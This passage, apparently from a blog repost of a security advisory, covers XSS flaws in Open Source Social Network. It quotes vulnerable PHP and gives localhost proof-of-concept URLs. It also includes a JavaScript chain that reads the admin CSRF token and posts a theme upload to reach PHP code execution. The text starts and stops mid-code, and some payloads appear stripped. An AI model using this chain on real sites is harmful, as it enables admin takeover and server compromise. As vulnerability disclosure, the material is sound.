"; echo '
' . ossn_print('result:type') . ''; foreach ($menus as $menu => $val) { foreach ($val as $link) { $menu = str_replace(':', '-', $link['text']); $icon = ossn_site_url() . "components/OssnSearch/images/{$menu}.png"; $text = ossn_print($link['text']); $link = $link['href']; echo "
- {$text}
- "; } } echo ''; 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ossn/home?offset=2&foo='"> Code /ossn/themes/default/pagination/view.php if (count($_GET)) { $args_url = ''; foreach ($_GET as $key => $value) { if ($key != 'page') { $args_url .= '&' . $key . '=' . $value; } } } [...] $url = "?offset={$first}{$args_url}"; echo "
- ".ossn_print('ossn:pagination:first')."
- "; 5. XSS to Code Execution Description Because the backend allows the upload of PHP files, the XSS vulnerabilities can lead to code execution. Proof of Concept http://localhost/ossn/search?q='"> /s.js: var csrfProtectedPage = 'http://localhost/ossn/administrator/theme_installer'; var html = get(csrfProtectedPage); document.body.innerHTML = html; var token = document.getElementsByName("ossn_token")[0].value; var timestamp = document.getElementsByName("ossn_ts")[0].value; submitRequest(token, timestamp); function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open("GET", url, false); xmlHttp.send(null); return xmlHttp.responseText; } function submitRequest(token, timestamp) { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/ossn/action/admin/theme_install", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment